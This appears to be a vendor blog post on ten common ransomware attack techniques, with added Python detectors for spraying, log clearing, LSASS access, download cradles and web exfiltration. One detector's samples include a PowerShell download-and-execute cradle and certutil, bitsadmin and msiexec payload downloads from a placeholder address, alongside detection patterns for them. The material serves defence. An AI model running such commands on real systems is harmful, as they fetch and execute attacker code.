The Top 10 Ransomware TTPs

In Arctic Wolf’s The State of Cybersecurity: 2024 Trends Report, we asked organisations what their primary area of concern was regarding cybersecurity, and for the third year running the answer was crystal clear: Ransomware.

Over half of all respondents ranked it as the number one concern their organisation faces, meaning it crossed the 50% threshold for the first time in our annual research. And, if the concern is growing, it’s for a good reason. 45% of the organisations surveyed admitted to being the victim of a ransomware attack in the past 12 months, and 91% of those faced data exfiltration as part of the attack, meaning that double- and triple-extortion tactics are now the norm, rising right alongside new norms like ransomware-as-a-service (RaaS).

With attacks and attack complexity increasing, it’s understandable that IT and security teams can feel like they’re fighting a losing battle against ransomware. But the security experts at Arctic Wolf Labs have identified ten major threat actor tactics, techniques, and procedures (TTPs) found in the majority of incident response engagements. Understanding how these TTPs are leveraged, where they fit and how they interact within the MITRE ATT&CK framework (a “globally accessible knowledge base of adversary tactics and techniques based on real-world observations”), and how you can protect your environment against them, is the first major step to safeguarding your organisation from ransomware attacks.

What Are Tactics, Techniques, and Procedures?

Tactics, Techniques, and Procedures (TTPs) refer to the patterns, activities, and methods of a threat actor or threat actor group. Simply, TTPs are how a cybercriminal conducts an attack.
There are three main parts to TTPs:

1. Tactics
Tactics are the high-level goals and strategy of a threat actor or threat actor group: the “why” behind an action. For example, a threat actor deciding to hold an organisation’s data to ransom is pursuing a tactic.

Common tactics include:

  • Reconnaissance
  • Delivery or exploitation
  • Objective actions

2. Techniques
Tactics are realised through techniques: the intermediate steps a threat actor takes toward a tactical goal, the “how” of an attack. For example, a threat actor sending a phishing email to steal credentials for a system or application would be a technique.

Common techniques include:

  • Network infiltration
  • Lateral movement
  • Malware launches
  • Data transfers or modifications

3. Procedures
Procedures are the specific steps a threat actor or threat actor group takes, using a particular technique, to achieve a tactic. Procedures are the most detailed and specific component of the three. Because procedures are specific to a given incident, there is no set of common procedures. However, there are broader patterns we can identify, such as running a social engineering campaign to harvest credentials that are then used to encrypt part of the network in a ransomware attack, or using stolen credentials to log in to a user’s email account and launch a business email compromise (BEC) attack.

The Top 10 Ransomware TTPs

Stage 3: Initial Access Techniques

In the modern cybersecurity world of cloud environments and hybrid work, threat actors have become adept at evading security solutions by pivoting rapidly and using several routes to the same objective. But every breach of an environment begins somewhere, a point the cybersecurity community refers to as “initial access.” Initial Access is the third tactic in the MITRE ATT&CK Enterprise matrix, after Reconnaissance and Resource Development, and the stage numbers used below follow that matrix order. Note that ATT&CK does not prescribe a strict sequence: real intrusions revisit tactics repeatedly, and a command-and-control channel, for instance, is usually set up long before the exfiltration stage. Research from Arctic Wolf Labs reveals that ransomware attacks begin with threat actors gaining initial access through TTPs like the following:

T1133 — External Remote Services
Remote services like virtual private networks (VPNs) and Remote Desktop Protocol (RDP) let users connect to internal network resources from anywhere with an internet connection. These services sit behind remote-access gateways which handle connections and credential authentication. Ransomware affiliates and initial access brokers target these externally facing remote services to obtain initial access into the environment.

Why Threat Actors Use It
Often, these services are not adequately protected: weak configuration or outright misconfiguration leaves them exposed, frequently without multi-factor authentication. Threat actors can then use brute-force or password-spraying techniques against accounts with weak, reused, or default passwords to gain access to an organisation’s environment. Password spraying in particular tries one or two common passwords against many accounts, which stays below per-account lockout thresholds; it is only visible when detection looks at the source of the attempts rather than the individual account.
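The source-centric view described above, as an added example that is not Arctic Wolf’s code: the Python below runs over a constructed batch of Windows Security Event ID 4625 (failed logon) records, normalised into dictionaries as a SIEM might present them. Field names, addresses, accounts and thresholds are assumptions of the example. Grouping by source address separates a spray (many distinct accounts, one or two failures each) from a brute force (many failures against one account), neither of which an account-lockout policy alone reliably catches.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Windows Security Event ID 4625 (failed logon) records as a
# SIEM might normalise them. Field names and addresses are assumptions of this example.
# Logon type 10 is RemoteInteractive (RDP); type 3 (network) covers most VPN/SMB logons.
SAMPLE_EVENTS = (
    # Password spray: one source, many accounts, one guess each.
    [{"ts": f"2024-05-01T02:00:{i:02d}", "src_ip": "203.0.113.7", "user": f"user{i:02d}",
      "event_id": 4625, "logon_type": 10} for i in range(25)]
    # Brute force: one source hammering a single account.
    + [{"ts": f"2024-05-01T02:01:{i:02d}", "src_ip": "198.51.100.9", "user": "Administrator",
        "event_id": 4625, "logon_type": 10} for i in range(40)]
    # Benign noise: a user mistypes a password twice.
    + [{"ts": "2024-05-01T02:03:00", "src_ip": "10.0.0.5", "user": "jdoe",
        "event_id": 4625, "logon_type": 10},
       {"ts": "2024-05-01T02:03:05", "src_ip": "10.0.0.5", "user": "jdoe",
        "event_id": 4625, "logon_type": 10}]
)

WINDOW = timedelta(minutes=10)
SPRAY_MIN_ACCOUNTS = 10     # distinct accounts failing from one source inside WINDOW
BRUTE_MIN_FAILURES = 20     # failures against one account from one source inside WINDOW
REMOTE_LOGON_TYPES = {3, 10}


def detect_auth_attacks(events, window=WINDOW, spray_min_accounts=SPRAY_MIN_ACCOUNTS,
                        brute_min_failures=BRUTE_MIN_FAILURES):
    """Return findings as (kind, src_ip, detail) tuples.

    Failures are grouped by source address and examined in a window anchored at
    that source's first failure; a production detector would use a rolling window.
    """
    failures = defaultdict(list)
    for e in events:
        if e["event_id"] != 4625 or e["logon_type"] not in REMOTE_LOGON_TYPES:
            continue
        failures[e["src_ip"]].append((datetime.fromisoformat(e["ts"]), e["user"].lower()))

    findings = []
    for src, attempts in failures.items():
        attempts.sort()
        start = attempts[0][0]
        in_window = [(t, u) for t, u in attempts if t - start <= window]

        # Spray: breadth across accounts from one source, regardless of per-account count.
        accounts = {u for _, u in in_window}
        if len(accounts) >= spray_min_accounts:
            findings.append(("password_spray", src,
                             f"{len(accounts)} accounts, {len(in_window)} failures"))

        # Brute force: depth against a single account from one source.
        per_account = defaultdict(int)
        for _, u in in_window:
            per_account[u] += 1
        for u, n in per_account.items():
            if n >= brute_min_failures:
                findings.append(("brute_force", src, f"{n} failures against {u}"))
    return findings


if __name__ == "__main__":
    for kind, src, detail in detect_auth_attacks(SAMPLE_EVENTS):
        print(f"{kind:15} {src:15} {detail}")
```

Against the sample, the spraying source is reported once (25 accounts, 25 failures) and the brute-forcing source once (40 failures against administrator), while the user who mistyped a password twice produces nothing. The same logic applies to VPN gateway or RADIUS logs once they are normalised to the same fields.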

T1190 — Exploit Public-Facing Application
Public-facing applications range from email servers such as Microsoft Exchange and VPN appliances to web applications and APIs. Ransomware affiliates hunt for misconfigurations in these applications or try to leverage known vulnerabilities and zero days against them in the hope that these have not yet been remediated and can be used to obtain initial access.

Why Threat Actors Use It
Threat actors make disproportionate use of a relatively small collection of proven vulnerabilities — many of them more than a year old. The reason for this is simple: It takes a threat actor a great deal of time and effort to learn how to effectively exploit a particular vulnerability in a public-facing application to aid them in their ransomware attacks. Because of this learning curve, they’ll continue to use the vulnerability so long as there are environments where it hasn’t been patched or mitigated.

Stage 4: Execution

After obtaining initial access through one of the means listed in the previous section, threat actors run malicious code on the compromised endpoint, often via this popular TTP:

T1059.001 — Command and Scripting Interpreter: PowerShell
PowerShell is a Windows command-line interface and scripting environment which threat actors can abuse to achieve execution. In a threat actor’s hands, PowerShell can be used to deploy payloads, execute commands, download files from a command and control (C2) server, run credential harvesting tools, and more.

Why Threat Actors Use It
PowerShell continues to be a tool of choice within the cybercrime community for at least a few reasons:

1. PowerShell comes preinstalled on most Microsoft Windows systems targeted by threat actors, providing a convenient means of executing malicious code following initial access.

2. As a ubiquitous utility, PowerShell’s use isn’t by itself a symptom of an intrusion, which helps threat actors to evade detection by endpoint protection and monitoring solutions. By “living off the land” (LotL) — leveraging tools already used in a target environment to bypass detections and abuse allowlists — it makes it harder for security teams to investigate, as it’s more difficult to separate illegitimate use from legitimate use.

3. With some effort, PowerShell can be downgraded to the legacy 2.0 engine (for example by launching powershell.exe with -Version 2), which lacks the script block logging and Antimalware Scan Interface (AMSI) integration added in PowerShell 5. Where that optional engine is still installed, this makes it even harder for security solutions to detect anomalous activity, especially when process creation and other critical events on endpoints are not externally monitored.

Stage 6: Privilege Escalation

Once threat actors have secured a foothold in your environment and established means of maintaining that access through system shutdowns, resets, and restarts, they turn their attention to expanding the scope of their attack. Here’s just one way they can do so:

T1078 — Valid Accounts
Whether obtained from initial access brokers, purchased on the dark web, gained through social engineering, or scraped with credential harvesting tools, threat actors using this TTP hold valid user credentials that give them broader horizontal and vertical access to the environment, including restricted parts of the network.

Why Threat Actors Use It
Valid credentials are a golden ticket for threat actors. They require no special coding or tooling to use and are as easy as entering a username and password to execute. Given that, in 2023, 68% of all breaches involved the human element, an organisation’s people are a historically reliable target for cybercriminals. And, by using valid credentials, the threat actor gains more time and raises fewer red flags, as a valid user accessing a portion of the environment for which they have permission doesn’t cause tools to alert until that user begins behaving in unexpected, erratic ways.

Stage 7: Defense Evasion

At this stage of attack, the name of the game now is evasion. Threat actors may try to make themselves invisible, work frantically to cover their tracks, or try and impersonate another user entirely. Here’s a popular method used by many ransomware groups:

T1070.001 — Indicator Removal: Clear Windows Event Logs
As a ransomware attack progresses, artifacts are created by an adversary or their actions (think footprints in the sand). These artifacts can be used by IT and security teams to detect that an attack is happening or assess which systems have been impacted. Windows Event Logs are just such an artifact: the Security, System, and Application logs record logons, service installations, process creation (when auditing is enabled), and other activity on an endpoint running Windows.

Why Threat Actors Use It
If a threat actor is able to clear Windows event logs — including system, application, and security logs — they have a better chance at evading detection and hiding their intrusion activity from IT and security teams, allowing them more time to exfiltrate data and extract a ransom. Clearing a log is itself noisy, though: Windows records Event ID 1102 in the Security log and Event ID 104 in the System log when a log is cleared, so those events are a high-fidelity detection, provided logs are forwarded off the host before they can be wiped.
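The forwarded-log detection described above, as an added example (not Arctic Wolf’s code) over a constructed stream of events from a log collector. Hosts, accounts, times and field names are assumptions. Because 1102 is written into the freshly cleared Security log and 104 names the channel that was cleared, the detector reports which log was wiped, by whom, and how many events from that host had already reached the collector, which is the evidence that survives the wipe.

```python
# Constructed sample of events already forwarded off the endpoints; hosts, users
# and times are assumptions of this example. 4624 = logon, 4688 = process creation.
SAMPLE_EVENTS = [
    {"host": "WS01", "channel": "Security", "event_id": 4624,
     "ts": "2024-05-01T03:10:00", "user": "CORP\\jdoe"},
    {"host": "WS01", "channel": "Security", "event_id": 4688,
     "ts": "2024-05-01T03:11:45", "user": "CORP\\jdoe"},
    # 1102 is the first entry of the freshly cleared Security log and names the subject.
    {"host": "WS01", "channel": "Security", "event_id": 1102,
     "ts": "2024-05-01T03:12:30", "user": "CORP\\jdoe"},
    # 104 is written to the System log and says which channel was cleared.
    {"host": "WS01", "channel": "System", "event_id": 104,
     "ts": "2024-05-01T03:12:31", "user": "CORP\\jdoe",
     "cleared_channel": "Microsoft-Windows-PowerShell/Operational"},
    {"host": "DC01", "channel": "Security", "event_id": 4624,
     "ts": "2024-05-01T03:13:00", "user": "CORP\\svc-backup"},
]


def detect_log_clearing(events):
    """Return one finding per clear event: host, which log, who did it, and how
    many events from that host had already been forwarded (and so survived)."""
    forwarded = {}   # host -> number of ordinary events seen before any clear
    findings = []
    for e in events:
        host = e["host"]
        if e["event_id"] == 1102 and e["channel"] == "Security":
            cleared = "Security"
        elif e["event_id"] == 104 and e["channel"] == "System":
            cleared = e.get("cleared_channel", "unknown")
        else:
            forwarded[host] = forwarded.get(host, 0) + 1
            continue
        findings.append({
            "host": host,
            "cleared_log": cleared,
            "by": e["user"],
            "ts": e["ts"],
            "events_preserved_offhost": forwarded.get(host, 0),
        })
    return findings


if __name__ == "__main__":
    for f in detect_log_clearing(SAMPLE_EVENTS):
        print(f"{f['ts']} {f['host']}: {f['cleared_log']} cleared by {f['by']} "
              f"({f['events_preserved_offhost']} earlier events already forwarded)")
```

There is no legitimate routine reason for the Security log to be cleared on a workstation, so this needs no allowlist; the one tuning decision is whether a scheduled log rotation on specific servers should be excluded by host and account.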

Stage 8: Credential Access

If the valid accounts used in the privilege escalation phase did not grant the threat actor domain-level privileges, they will now attempt to obtain those privileges using one of several TTPs, like this common one:

T1003.001 — OS Credential Dumping: LSASS Memory
When a user logs on interactively, the Local Security Authority Subsystem Service (LSASS) keeps credential material for that session in its process memory: NTLM password hashes, Kerberos tickets, and, on systems where the legacy WDigest provider is still enabled, cleartext passwords. Threat actors harvest this material by reading LSASS memory with open-source tools such as Mimikatz, or by dumping the process with a utility like ProcDump or Task Manager and parsing the dump offline.

Why Threat Actors Use It
While most endpoint monitoring tools can detect this type of attack, it remains popular with threat actors for the sheer amount of credential material held in LSASS memory. If successful, they gain high-privilege account credentials that allow them to create new user accounts to maintain persistence, remove accounts to improve evasion, and greatly aid lateral movement. Credential Guard and running LSASS as a protected process (RunAsPPL) raise the bar considerably, and any process other than a small set of known system components opening LSASS with memory-read access is worth an alert.
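The memory-read check mentioned above, as an added example (not Arctic Wolf’s code): the Python below inspects constructed Sysmon Event ID 10 (ProcessAccess) records whose target is lsass.exe, decodes the GrantedAccess mask into Windows process access rights, and flags reads from images outside an assumed allowlist. It also flags a call trace that passes through unbacked memory (Sysmon reports such frames as UNKNOWN), which catches a dumper injected into an otherwise trusted process. Image paths, the allowlist and the sample events are assumptions of the example.

```python
# Windows process access rights that matter for reading another process's memory.
ACCESS_RIGHTS = {
    0x0010: "PROCESS_VM_READ",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
    0x0008: "PROCESS_VM_OPERATION",
    0x0020: "PROCESS_VM_WRITE",
    0x0080: "PROCESS_CREATE_PROCESS",
}
PROCESS_ALL_ACCESS = 0x1FFFFF
PROCESS_VM_READ = 0x0010

# Assumed allowlist of images that legitimately open LSASS; tune it per environment
# and keep it as short as the environment allows.
EXPECTED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}

LSASS = r"C:\Windows\System32\lsass.exe"
# Constructed Sysmon Event ID 10 records; paths and masks are assumptions of this example.
SAMPLE_EVENTS = [
    {"event_id": 10, "source_image": r"C:\Windows\System32\svchost.exe", "target_image": LSASS,
     "granted_access": "0x1000", "call_trace": r"C:\Windows\SYSTEM32\ntdll.dll+9d234"},
    {"event_id": 10, "source_image": r"C:\Users\Public\mk.exe", "target_image": LSASS,
     "granted_access": "0x1010", "call_trace": r"C:\Windows\SYSTEM32\ntdll.dll+9d234"},
    {"event_id": 10, "source_image": r"C:\Windows\System32\Taskmgr.exe", "target_image": LSASS,
     "granted_access": "0x1400", "call_trace": r"C:\Windows\SYSTEM32\ntdll.dll+9d234"},
    {"event_id": 10, "source_image": r"C:\Windows\Temp\procdump64.exe", "target_image": LSASS,
     "granted_access": "0x1FFFFF", "call_trace": r"C:\Windows\SYSTEM32\ntdll.dll+9d234"},
    # Allowlisted image, but the call stack runs through unbacked memory: injected code.
    {"event_id": 10, "source_image": r"C:\Windows\System32\svchost.exe", "target_image": LSASS,
     "granted_access": "0x1010", "call_trace": r"C:\Windows\SYSTEM32\ntdll.dll+9d234|UNKNOWN(000001A2B3C40000)"},
    {"event_id": 10, "source_image": r"C:\Users\Public\mk.exe",
     "target_image": r"C:\Windows\System32\notepad.exe", "granted_access": "0x1FFFFF", "call_trace": ""},
]


def decode_access(mask):
    """Translate a GrantedAccess mask into the access-right names it contains."""
    if mask & PROCESS_ALL_ACCESS == PROCESS_ALL_ACCESS:
        return ["PROCESS_ALL_ACCESS"]
    return [name for bit, name in ACCESS_RIGHTS.items() if mask & bit]


def analyse_lsass_access(events):
    """Return findings for handles to lsass.exe that look like credential dumping."""
    findings = []
    for e in events:
        if e["event_id"] != 10 or not e["target_image"].lower().endswith("\\lsass.exe"):
            continue
        mask = int(e["granted_access"], 16)
        source = e["source_image"].lower()
        reasons = []
        if mask & PROCESS_VM_READ and source not in EXPECTED_SOURCES:
            reasons.append("memory read from unexpected image")
        if "UNKNOWN" in e.get("call_trace", ""):
            reasons.append("call stack passes through unbacked memory")
        if reasons:
            findings.append({"source_image": e["source_image"],
                             "rights": decode_access(mask), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyse_lsass_access(SAMPLE_EVENTS):
        print(f["source_image"], f["rights"], "; ".join(f["reasons"]))
```

Masks such as 0x1010 (VM_READ plus QUERY_LIMITED_INFORMATION) and 0x1FFFFF (all access) are the shapes produced by Mimikatz-style readers and full process dumps respectively, while the Task Manager entry with 0x1400 is query-only and is left alone.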

T1555 — Credentials from Password Stores
Depending on the target environment’s operating system (OS) or the application threat actors have breached, passwords may be stored in several places. In this TTP, cybercriminals use open-source tools such as LaZagne or Mimikatz to pull legitimate credentials out of local password stores, including web browsers, the Windows Credential Manager, saved Wi-Fi profiles, and password manager databases.

Why Threat Actors Use It
Credentials are stored in a variety of places, from endpoint caches and browser profiles to file shares and domain controllers, and threat actors can attempt to access any or all of them to obtain the passwords they need to further their attack.

Stage 10: Lateral Movement

This stage is critical to a ransomware attack’s success. Without the ability to spread throughout the entire environment, encrypting or locking up all systems, threat actors are unlikely to be able to extort payment from an organisation. Lateral movement TTPs like this ensure that ability:

T1570 — Lateral Tool Transfer
To infect as many endpoints and as much of a target’s environment as possible, ransomware affiliates distribute executables and tooling within the victim environment through lateral tool transfer. By copying files over SMB administrative shares (ADMIN$, C$), pushing them with PsExec-style remote execution tools, using RDP drive redirection, or calling native utilities such as the ftp command, threat actors can pass their attack kit across the environment, infecting endpoints and servers as they go.

Why Threat Actors Use It
Many of these tools and protocols are used legitimately by organisations and already exist in the environment. By leveraging them for their nefarious purposes, threat actors can compromise systems, servers, and endpoints quickly, while also — as a bonus — hiding their movements among normal administrative traffic.

Stage 12: Command and Control

It’s at this point that the ransomware attack truly comes together. The threat actor has gained access to your environment, gained the ability to spread their malware deep into your systems, and has been able to remain inside long enough to execute the attack. Throughout, they communicate with an external command-and-control (C2) server, often via a framework like Cobalt Strike, which issues the commands needed to complete the attack. In practice this channel is usually established shortly after execution; it appears here only because of where ATT&CK places the tactic.

T1105 — Ingress Tool Transfer
Once inside an organisation’s IT environment, threat actors often need a way to download additional payloads, files, or tools to complete the attack. Ingress tool transfer is often carried out through built-in scripting hosts such as PowerShell and WScript, and sometimes by abusing other built-in tools such as msiexec, certutil, or bitsadmin to fetch files over HTTP.

Why Threat Actors Use It
Ingress tool transfer via a C2 server creates an open, unobstructed pathway for near-instant download and delivery of whatever the threat actor needs to complete their attack. Since, at this stage, they may already have been spotted by security teams, time is of the essence, and a clear delivery channel free of roadblocks is deeply appealing and highly useful.
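Both the PowerShell abuses from the Execution section (engine downgrade to 2.0, encoded commands hiding download cradles) and the built-in download tools described here show up in process creation command lines, so one analyser serves both. It is an added example, not Arctic Wolf’s code: the command lines are constructed, the staging address is a documentation-range address, and the indicator names are assumptions. -EncodedCommand carries base64-encoded UTF-16LE text, so the analyser decodes it and searches the decoded script as well as the raw command line.

```python
import base64
import re

# All patterns are case-insensitive. powershell.exe accepts unambiguous parameter
# prefixes, so the real binary honours -v / -ver and -e / -ec / -enc as well.
DOWNGRADE = re.compile(r"(?i)(?:^|\s)-v(?:ersion)?\s+2(?:\.0)?(?=\s|$)")
ENCODED = re.compile(r"(?i)(?:^|\s)-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})")
CRADLE = re.compile(r"(?i)\b(?:iex|invoke-expression|downloadstring|downloadfile|"
                    r"invoke-webrequest|iwr|net\.webclient|start-bitstransfer)\b")
# Built-in binaries commonly abused to fetch payloads (ingress tool transfer).
LOLBIN_DOWNLOAD = [
    ("certutil", re.compile(r"(?i)-urlcache\b.*https?://")),
    ("bitsadmin", re.compile(r"(?i)/transfer\b.*https?://")),
    ("msiexec", re.compile(r"(?i)/i\s+https?://")),
    ("mshta", re.compile(r"(?i)https?://")),
]

# Constructed sample command lines; the address 203.0.113.7 is reserved for documentation.
_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/stage.ps1')"
SAMPLE_COMMAND_LINES = [
    r'powershell.exe -NoProfile -ExecutionPolicy Bypass -Version 2 -Command "Get-Process"',
    "powershell -nop -w hidden -enc " + base64.b64encode(_STAGER.encode("utf-16-le")).decode(),
    r"certutil.exe -urlcache -split -f http://203.0.113.7/a.exe C:\Users\Public\a.exe",
    r"bitsadmin /transfer job /download /priority high http://203.0.113.7/b.exe C:\Users\Public\b.exe",
    r"msiexec /q /i http://203.0.113.7/p.msi",
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Get-ChildItem C:\Temp"',
    r"certutil -hashfile C:\Temp\setup.exe SHA256",   # legitimate certutil use
]


def decode_encoded_command(blob):
    """-EncodedCommand carries base64 of UTF-16LE text; return None if blob is not that."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _image_name(cmdline):
    """Lower-cased file name of the executable, with any path and quotes stripped."""
    parts = cmdline.split()
    first = parts[0] if parts else ""
    return first.strip('"').rsplit("\\", 1)[-1].lower()


def analyse_command_line(cmdline):
    """Return the list of indicator names triggered by one process command line."""
    flags = []
    image = _image_name(cmdline)
    if image.startswith(("powershell", "pwsh")):
        if DOWNGRADE.search(cmdline):
            flags.append("powershell_v2_downgrade")
        searchable = cmdline
        m = ENCODED.search(cmdline)
        if m:
            flags.append("powershell_encoded_command")
            decoded = decode_encoded_command(m.group(1))
            if decoded:
                searchable += " " + decoded   # inspect the decoded script as well
        if CRADLE.search(searchable):
            flags.append("download_cradle")
    for name, pattern in LOLBIN_DOWNLOAD:
        if image.startswith(name) and pattern.search(cmdline):
            flags.append(f"ingress_via_{name}")
    return flags


if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        print(analyse_command_line(line) or "-", line[:70])
```

Command-line matching only works if process creation is being recorded (Security Event ID 4688 with command-line auditing enabled, or Sysmon Event ID 1) and forwarded; the downgrade indicator in particular exists precisely because the attacker is trying to escape PowerShell’s own logging, so the process creation record may be the only trace.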

Stage 13: Exfiltration

As ransomware attacks have grown in frequency, the cybersecurity industry and business world have increased their efforts at thwarting threat actor efforts, including everything from new security tools to restoring from backups to refusing to pay ransoms. Rather than acting as a deterrent, this has spurred innovation, leading to double extortion — where threat actors exfiltrate the data before encrypting it, then threaten to release the proprietary and private information online if the organisation won’t pay — and triple extortion, where the threat actors contact users who’ve had their data exfiltrated directly in the hopes of extracting additional payments from them.

T1567 — Exfiltration Over Web Service
Threat actors frequently leverage publicly available services for malicious ends, and this TTP is no different. By pushing data to readily available services like Google Drive or Telegram with tools like Rclone or WinSCP, they can quickly transmit large amounts of data over the internet to storage they control.

Why Threat Actors Use It
There are more covert means threat actors can employ to make off with an organisation’s data. However, few are as easy. Many organisations’ firewalls and proxies already permit outbound traffic to these types of web services, which makes exfiltration faster and harder to distinguish from legitimate use. The tell is usually volume and tooling: hundreds of megabytes or more uploaded from a single host to one storage service, often with a sync tool’s user agent rather than a browser’s.
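The volume-and-tooling check above, as an added example that is not Arctic Wolf’s code: the Python below parses constructed proxy log lines, sums bytes uploaded per source host and storage service, and flags a host that crosses an assumed 1 GB threshold or uses Rclone’s user agent (Rclone identifies itself as rclone/v<version> by default). The service hostnames, threshold, addresses and log format are assumptions of the example.

```python
import csv
import io
from collections import defaultdict

# Hostnames of web services commonly used for exfiltration; an assumed, partial list.
WEB_STORAGE = {
    "drive.google.com": "google_drive",
    "www.googleapis.com": "google_drive",
    "api.telegram.org": "telegram",
    "content.dropboxapi.com": "dropbox",
}
UPLOAD_THRESHOLD_BYTES = 1_000_000_000   # 1 GB per source host and service (assumed)
TRANSFER_TOOL_AGENTS = ("rclone/",)       # rclone's default User-Agent is rclone/v<version>

# Constructed proxy log in CSV form; addresses, users and sizes are assumptions.
SAMPLE_PROXY_LOG = """\
ts,src_ip,user,method,host,bytes_out,user_agent
2024-05-01T04:00:01,10.0.0.21,CORP\\jdoe,POST,www.googleapis.com,400000000,rclone/v1.66.0
2024-05-01T04:03:10,10.0.0.21,CORP\\jdoe,POST,www.googleapis.com,400000000,rclone/v1.66.0
2024-05-01T04:06:22,10.0.0.21,CORP\\jdoe,POST,www.googleapis.com,400000000,rclone/v1.66.0
2024-05-01T04:07:00,10.0.0.30,CORP\\asmith,POST,drive.google.com,5000000,Mozilla/5.0 (Windows NT 10.0) Chrome/124.0
2024-05-01T04:08:15,10.0.0.31,CORP\\bwong,POST,api.telegram.org,50000000,python-requests/2.31.0
2024-05-01T04:09:00,10.0.0.40,CORP\\clee,GET,drive.google.com,1200,Mozilla/5.0 (Windows NT 10.0) Chrome/124.0
"""


def detect_web_exfil(log_text, threshold=UPLOAD_THRESHOLD_BYTES):
    """Return {(src_ip, service): [reasons]} for hosts whose uploads look like exfiltration."""
    uploaded = defaultdict(int)
    tool_seen = defaultdict(set)
    for row in csv.DictReader(io.StringIO(log_text)):
        service = WEB_STORAGE.get(row["host"].lower())
        # Only upload-shaped requests to known storage services count toward the total.
        if service is None or row["method"].upper() not in ("POST", "PUT"):
            continue
        key = (row["src_ip"], service)
        uploaded[key] += int(row["bytes_out"])
        if row["user_agent"].startswith(TRANSFER_TOOL_AGENTS):
            tool_seen[key].add(row["user_agent"])

    findings = {}
    for key in sorted(set(uploaded) | set(tool_seen)):
        reasons = []
        if uploaded.get(key, 0) >= threshold:
            reasons.append(f"{uploaded[key] / 1e9:.1f} GB uploaded")
        if tool_seen.get(key):
            reasons.append("sync tool user agent: " + ", ".join(sorted(tool_seen[key])))
        if reasons:
            findings[key] = reasons
    return findings


if __name__ == "__main__":
    for (src, service), reasons in detect_web_exfil(SAMPLE_PROXY_LOG).items():
        print(f"{src} -> {service}: " + "; ".join(reasons))
```

In the sample only 10.0.0.21 is reported, on both counts; the browser upload of a few megabytes and the modest Telegram post fall below the threshold, and the download is ignored because only POST and PUT bodies are summed. Hosts that legitimately sync large data sets to a sanctioned service belong in a per-host exception rather than a raised global threshold.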

How To Defend Against the Top 10 Ransomware TTPs

Like all attack vectors, the best defense involves a comprehensive security strategy that contains proactive and reactive components. By examining the common TTPs exploited by ransomware groups and individual threat actors, we can recommend the following actions, which should occur in parallel and continuously, to reduce your cyber risk while improving your security posture.

Identity and Access Controls
Be it through social engineering, the purchase of stolen credentials, or even a brute-force attack, access often begins with a password. In addition, credentials can be used by the threat actor to gain privileged access, allowing them to deploy ransomware into critical parts of the network.

Proactive and reactive measures security teams can take to improve credential security include:

Ongoing Vulnerability Management
While zero days make headlines, it’s often known, unpatched vulnerabilities that allow threat actors to gain access to a network or system. By staying on top of vulnerabilities, an organisation goes a long way in hardening their attack surface. A full, risk-based vulnerability management program prioritizes continuous vulnerability remediation and assessment, with other components of the program complementing and assisting overall remediation and mitigation.

Managed Detection and Response (MDR)
Monitoring is critical for catching attacks early, especially as threat actors use legitimate tooling, such as PowerShell and built-in Windows administration utilities, for malicious ends. Without proper monitoring and detection, unusual behaviour in those tools would go unnoticed. In addition, swift detection and response capabilities allow your organisation to stop a ransomware threat while the threat actors are still trying to gain initial access, or before they can move laterally.

Incident Response
An insurance-approved incident response (IR) team provides the full suite of services needed to recover from a cyber attack like ransomware and quickly restore business operations to pre-incident conditions. A proper IR team will remove the threat actor from your environment, negotiate with threat actors, determine the root cause and extent of the attack, and restore critical systems.

Learn more about the ransomware ecosystem – from RaaS operators to ransom demands to how ransomware attacks work – with our interactive resource, Ransomware Explained.

Gain an in-depth understanding of some of the critical decision points organisations are faced with during a ransomware incident in our on-demand webinar, Experience Ransomware Without the Ransom.

Get an inside look at how Concierge Security experts within Arctic Wolf’s industry-leading Security Operations triage workflow investigated, escalated, and remediated a ransomware attack on a local government organization.

Arctic Wolf

Arctic Wolf provides your team with 24x7 coverage, security operations expertise, and strategically tailored security recommendations to continuously improve your overall posture.